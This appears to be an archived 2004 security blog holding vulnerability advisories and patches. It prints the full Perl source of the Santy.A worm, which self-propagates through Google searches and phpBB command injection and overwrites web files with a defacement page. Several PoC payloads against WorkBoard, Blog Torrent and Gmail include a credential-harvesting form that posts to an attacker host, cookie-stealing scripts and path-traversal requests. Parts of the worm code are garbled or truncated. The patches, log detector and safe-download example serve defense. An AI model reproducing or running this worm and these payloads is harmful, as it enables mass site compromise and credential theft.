Santy.A Web Worm Source Code (PoC) and patch

Wednesday, December 22, 2004


If you are affected, here is how to patch your web site:


Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
   for($i = 0; $i < sizeof($words); $i++)
   {


and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
   for($i = 0; $i < sizeof($words); $i++)
   {


Please inform as many people as possible about this issue. If you're a hosting provider,
please inform your customers if possible. Otherwise we advise you to implement some level of
additional security if you run Ensim or have PHP running as CGI under suexec, etc.

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
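Why the one-line change above closes the hole, and one way to spot the worm's requests in a web server log, as an added example in Python (not code from phpBB or from the worm). PHP has already URL-decoded $HTTP_GET_VARS['highlight'] once when the script starts; the extra urldecode() decodes it a second time, so a value sent as %2527%252E (a double-encoded quote and dot) reaches the highlight code as '. and can break out of the quoted string, whereas after the patch it stays as the harmless text %27%2E. The access-log lines are constructed, php_htmlspecialchars mimics the PHP 4 default of leaving the single quote alone, and the log signature is an assumption based only on the request shape visible in the worm source further down this page.

```python
import re
from urllib.parse import unquote


def php_htmlspecialchars(s):
    """Mimic PHP 4's default htmlspecialchars(): escapes & < > and the double
    quote, but leaves the single quote untouched (so a decoded ' survives)."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def highlight_words_vulnerable(raw_query_value):
    """phpBB <= 2.0.10 behaviour: PHP decodes the query string once when it
    fills $HTTP_GET_VARS, then viewtopic.php calls urldecode() on it again."""
    once = unquote(raw_query_value)            # what PHP hands to the script
    twice = unquote(once)                      # the extra urldecode() call
    return php_htmlspecialchars(twice).strip().split(" ")


def highlight_words_fixed(raw_query_value):
    """Patched behaviour: the value is decoded only once, by PHP itself."""
    once = unquote(raw_query_value)
    return php_htmlspecialchars(once).strip().split(" ")


# Constructed sample in the shape the worm sends: %2527 is a double-encoded
# single quote and %252E a double-encoded dot (string concatenation in PHP).
WORM_STYLE_VALUE = "%2527%252Esystem(chr(105)%252echr(100))%252e%2527"

# Constructed Apache combined-log lines; only the last two carry the signature.
SAMPLE_ACCESS_LOG = """\
10.0.0.1 - - [21/Dec/2004:03:14:07 +0000] "GET /phpBB/viewtopic.php?t=123&highlight=perl HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
10.0.0.2 - - [21/Dec/2004:03:14:09 +0000] "GET /phpBB/viewtopic.php?t=123&highlight=%2527%252Esystem(chr(112)%252echr(101))%252e%2527 HTTP/1.0" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.3 - - [21/Dec/2004:03:14:11 +0000] "GET /phpBB/viewtopic.php?t=123&highlight=%2527%252Efwrite(fopen(chr(109),chr(97)),chr(35)),exit%252e%2527 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
# Signature (assumption): a highlight value that opens with the double-encoded
# quote-and-dot prefix that all three request types in the worm source share.
SANTY_SIGNATURE = re.compile(r"highlight=%2527%252e", re.IGNORECASE)


def find_santy_requests(log_text):
    """Return (client_ip, request_path) for every log line matching the signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and SANTY_SIGNATURE.search(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


if __name__ == "__main__":
    print("vulnerable:", highlight_words_vulnerable(WORM_STYLE_VALUE))
    print("fixed:     ", highlight_words_fixed(WORM_STYLE_VALUE))
    for ip, path in find_santy_requests(SAMPLE_ACCESS_LOG):
        print("suspicious request from", ip, "->", path)
```

The double decode is the whole story: a single decode of %2527 can only ever yield the literal text %27, which cannot terminate a PHP string, so removing urldecode() is sufficient without touching the rest of the highlight code. The log check matches on the request path rather than on the User-Agent, because the worm's User-Agent string is an ordinary browser string.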

######################################################
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)
# Date : 22/12/2004
# Solution : Upgrade to phpBB version 2.0.11
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# ~~ For educational purpose ~~
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.k-otik.com/news/20041221.phpbbworm.php
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#######################################################
#!/usr/bin/perl
use strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print
q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName)
. ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName)
. ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . ord($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all'
. '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000))
.
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif
width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo .= GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $res HTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012"
.
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i
or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub PayLoad() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/ ');
for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}



Workboard input validation error in task_id and project_id variables

Friday, December 17, 2004

#########################################
WorkBoard input validation error in the
task_id and project_id variables
lets remote users perform XSS attacks
vendor: http://www.burnwave.com/modules.php?name=Archives&op=info&did=15

Developer: Michael Squires
vendor notified: yes (MSN conversation) exploit included: yes
original advisory: http://lostmon.blogspot.com/2004/12/workboard-input-validation-error-in.html
OSVDB ID: 12504
Secunia: SA13574
##########################################


WorkBoard is a project/task manager used primarily for software development
(in this case PHP, but it can be used for non-software projects).
This script has two input validation errors, and a remote user can conduct
cross-site scripting (XSS) attacks.

The flaw is in the 'project_id' variable:


http://[target]/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]

http://[target]/modules.php?name=WorkBoard&file=project&project_id=2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

and the same flaw affects the 'task_id' variable:


http://[target]/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]
http://[target]/modules.php?name=Work_Board&op=Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

I'm speaking with the developer in an MSN conversation....
but he is not interested in fixing it ????
:///

Sincerely

Lostmon (lostmon@gmail.com)


Thanks to Estrella for being my light

Thanks to all who believed in me




--

Curiosity is what moves the mind.



=============================================

Conversation with the developer by MSN


==================================================

No interest in fixing it ??? :O


X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
hello !

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
Yes?

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
hello, you are the developer of

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
workboard ?

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
yes, I am.

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
okis I have found 2 possible flaws

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
in your work

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
in 2 variables

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
unfortunately I do NOT support my free scripts

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
thanks for reading

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
if you want an updated version of workboard, go to nukescripts.net.

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! says:
thanks

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com ...\\----X says:
no like toi see ?



The following message could not be delivered to all recipients:

no like toi see ?





--
Curiosity is what moves the mind.

POSSIBLE FIX

For the variable project_id

search: $project_id = intval($project_id);


replace with:

case "Project":

$project_id = intval($project_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$project_id";


For the variable task_id

search: $task_id = intval($task_id);


replace with:

case "task":

$task_id = intval($task_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$task_id";


Bug found by: Lostmon (lostmon@gmail.com)

Fix by Lmc and by Suko, http://spanishwebmaster.com


Sincerely
Lostmon (lostmon@gmail.com)
Thanks to Suko & Lmc

Disclosure in Froogle PHP script and setup.php unauthorized access

Tuesday, December 14, 2004

############################################
disclosure in Froogle php script by http://www.68designs.com/
target: Froogle script version 1.0
vendor url: http://www.68designs.com/kb/link.php?id=5
impact: disclosure of installation path, unauthorized access
Exploit included: yes vendor informed: yes
OSVDB ID: 12481
Secunia: SA13504
Securitytracker: 1012553
############################################

The Froogle script is a PHP web-based script for adding to an e-commerce suite or store,
to manage the Froogle account easily or offer products on Froogle.

In a default installation this script needs, in order to install, a file called 'setup.php'
(no authentication is needed to run the script); any user can call
this file and reinstall the application in certain cases, or obtain
administrative access to the application.
Proof of concept:

http://[target]/froogle_path/setup.php
http://[target]/froogle/setup.php?option=step1
http://[target]/froogle/setup.php?option=step2

Sincerely:
Lostmon (lostmon@gmail.com)

Thanks to Estrella for being my light
Thanks to all who believed in me

Securitytracker url: http://securitytracker.com/alerts/2004/Dec/1012553.html

--
Curiosity is what moves the mind....

Variable 'file' in Blog Torrent 'btdownload.php' input validation error (cross-site scripting)

Tuesday, December 07, 2004
####################################
variable 'file' in Blog Torrent 'btdownload.php'
input validation error (cross-site scripting)
vendor: www.blogtorrent.com/
http://sourceforge.net/tracker/index.php?func=detail&aid=1080615&group_id=109524&atid=654202
Preview Version 0.8
vendor notified: yes exploit included: yes
impact: execute JavaScript code, remote file inclusion,
remote command execution.
OSVDB ID: 12250, 12251
Securitytracker: 1012452
####################################



Blog Torrent is a PHP web script for managing
torrent links and users from the blog, and other options...

The variable 'file' in Blog Torrent's 'btdownload.php' has an input
validation error and permits inserting JavaScript and executing code,
plus a remote file inclusion and remote command execution vulnerability.

Proof of concept:

get session cookie:

http://[target]/bittorrent_module/btdownload.php?
file=<script>alert(document.cookie)</script>



http://[target]/bittorrent_module/btdownload.php?
file=<script>document.write(document.cookie)</script>



insert content:


http://[target]/bittorrent_module/btdownload.php?

file=<img%20src=http://www.google.es/images/logo_sm.gif>


insert remote web page:


http://[target]/bittorrent_module/btdownload.php?
file=<iframe%20src=http://www.google.es/></iframe>


insert remote database (form):

http://[target]/bittorrent_module/btdownload.php?
file=<form%20action="http://www.atacker.com/savedb.php"%
20method="post">Username:<input%20name="username"%20type=
"text"%20maxlength="30">Password:<input%20name="password"
%20type="text"%20maxlength="30"><input%20name="login"%20
type="submit"%20value="Login"></form>



In savedb.php I have query strings to save the password

and username variables.

savedb.php obtains the cookie:

<?

$archivo = 'tostada.txt';

$fp = fopen($archivo, "a");

$string = "$cookie";

$write = fputs($fp, $string);

fclose($fp);

?>

and saves it into a txt file,

and saves the user and password:


<?php

mysql_db_query("passwordssss","insert into $usuario (usuario,pass)

values ('$usuario','$password')");

?>


With these values, whatever the user enters is saved in a small database containing

only 2 tables, password & username :)



disclosure of username and password hash:



http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=../data/users></iframe>

or

http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=http://[target]/torrent_blog/data/users></iframe>


download arbitrary files from the server or blog:



http://[target]/torrent_blog/btdownload.php?type=torrent&file=[path%file]

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../password.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../settings.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../login.php
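A defensive counterpart to the 'file' parameter problems above, as an added example in Python (not Blog Torrent's own code): the same parameter is both reflected into the page (the XSS) and used to open a file (the ../password.php traversal), so a download handler needs an allow-list on the name, a check that the resolved path stays inside the download directory, and HTML escaping before anything is echoed back. The directory layout is built in a temporary folder inside demo(), the SAFE_NAME policy and the .torrent-only rule are assumptions for this example, and resolve_download and error_message are hypothetical names.

```python
import html
import re
import tempfile
from pathlib import Path

# Allow-list for the 'file' value: a plain file name, no slashes, no HTML
# metacharacters, no leading dot (assumed policy for this example).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def resolve_download(base_dir, requested, allowed_ext=(".torrent",)):
    """Map a user-supplied 'file' value to a real path under base_dir.
    Returns the resolved Path, or None if the request must be refused."""
    if not SAFE_NAME.fullmatch(requested):
        return None                  # '../x', '<script>', '' all fail here
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    # Belt and braces: even after the allow-list, the final path must stay
    # inside the download directory (guards against symlinks in base_dir).
    if base not in candidate.parents:
        return None
    if candidate.suffix.lower() not in allowed_ext or not candidate.is_file():
        return None
    return candidate


def error_message(requested):
    """Error text that is safe to echo back: reflecting the raw value into the
    page is the XSS the advisory describes, so it is HTML-escaped first."""
    return "File not found: " + html.escape(requested, quote=True)


def demo():
    """Build a throwaway tree and exercise the checks; results are returned as
    plain values so the temporary directory can be removed before returning."""
    with tempfile.TemporaryDirectory() as tmp:
        torrents = Path(tmp) / "torrents"
        torrents.mkdir()
        (torrents / "good.torrent").write_text("d8:announce0:e")   # constructed
        (torrents / "notes.txt").write_text("not a torrent")         # constructed
        (Path(tmp) / "password.php").write_text("<?php /* secret */ ?>")  # outside base
        ok = resolve_download(torrents, "good.torrent")
        return {
            "good": ok is not None and ok.name == "good.torrent",
            "traversal": resolve_download(torrents, "../password.php"),
            "html_in_name": resolve_download(torrents, "<script>alert(1)</script>"),
            "wrong_ext": resolve_download(torrents, "notes.txt"),
            "missing": resolve_download(torrents, "missing.torrent"),
            "escaped": error_message("<iframe src=../data/users></iframe>"),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The allow-list alone would already reject every payload shown in this advisory; the containment check is kept because a regex on the name says nothing about what a symlink inside the download directory points to.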




securitytracker url: http://www.securitytracker.com/alerts/2004/Dec/1012452.html

Sincerely

Lostmon (lostmon@gmail.com)


Thanks to Estrella for being my light

Thanks to all who believed in me
--
Curiosity is what moves the mind...

zx issue fix from Gmail can be bypassed with the equal symbol "="

Sunday, December 05, 2004
hello !!

After looking at this "bug" (http://securitytracker.com/alerts/2004/Nov/1012289.html)
I looked at what you did to correct this issue, and I am happy this bug is solved:
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1

but this issue can be repeated; you only need a '=' symbol in the URL after the 'zx' variable, like this:

Again denial of service :/
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=18acabd2b173f0d81040559556[just here insert the symbol]%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1

http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=18acabd2b173f0d81040559556=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1

and the loop repeats :-)

Sincerely:
Lostmon (Lostmon@gmail.com)

Thanks to Estrella for being my light
Thanks to all who believed in me
--
Curiosity is what moves the mind....

Denial of service on Gmail account

If a user has their Gmail cookie active, they could be
vulnerable to this type of attack, with which we could
go as far as denying the service.


#######################################

Denial of service on Gmail account

vendor url: http://gmail.google.com/

vendor notified: yes exploit included: yes

original advisory: http://lostmon.spymac.net/blog/

########################################




Thus a malicious user could craft a malicious URL and...

1- modify, or let's say fool, the user with a non-existent label:

http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=

As we can see, the "remove label" button shows us the title included in
[label_name], which may not exist.

2- Cross-site scripting:

The zx variable checks neither the length of the input nor whether the

input is valid, allowing us to include script code to be executed.



http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=8acabd2b173f0d81040559556[XSS-code]&fs=1

3- causing a denial of service :)

Because the zx variable allows code execution, any code we use will make the fs variable repeat again and again and again; the result is a denial of service, since the user cannot see the Gmail page because it is "refreshing" every time:


http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1



Sincerely

Lostmon (lostmon@gmail.com)

Thanks to http://www.ayuda-internet.net for their support

Thanks to Rottew and ismax

Thanks to Estrella for being my light



Curiosity is what moves the mind....


Gmail remote information disclosure



hello:


After finding a bug in Gmail's 'zx' variable a little while ago, I say Gmail

reveals the contact list to remote users, discloses the account name, and grants

access to the account if the cookie is active, and with some URLs one can list

contact labels or other information to send to an attacker's web
site:

a situation, or a proof of concept:


1- send a mail to the Gmail account; the information is the same... (no

spamming please :D)


2- send this email in HTML format, and you can take two actions:


2.1 include code in the HTML of this email (mail.html)

2.2 send a link and wait for users to click on it...


If the Gmail cookie is active and the user clicks on it, any user can view

this information and can use it or send it to other sites via a web form or

other means.


Sample of Mail.html


<html>

<head>

<title>Gmail disclosure informatio Xploit</title>

<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

</head>

<body>

<table width="80%" border="0" align="center">

<tr>

<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="http://gmail.google.com/gmail?view=page&name=contacts&amp;ver="

></iframe>

</h5></td>

</tr>

<tr>

<td height="21"> <h5><strong>user&acute;s
name

account</strong><script>document.write(document.cookie)</script>

<iframe height="100%" id="iframe" width="100%"

frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="

></iframe>

</h5></td>

</tr>

<tr>

<td height="48"> <h5> user account options

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>

</h5></td>

</tr>

<tr>

<td height="48"><script>document.write(document.cookie)</script> </td>

</tr>

</table>

</body>

</html>


Sincerely:

Lostmon (Lostmon@gmail.com)


--

Curiosity is what moves the mind....

 
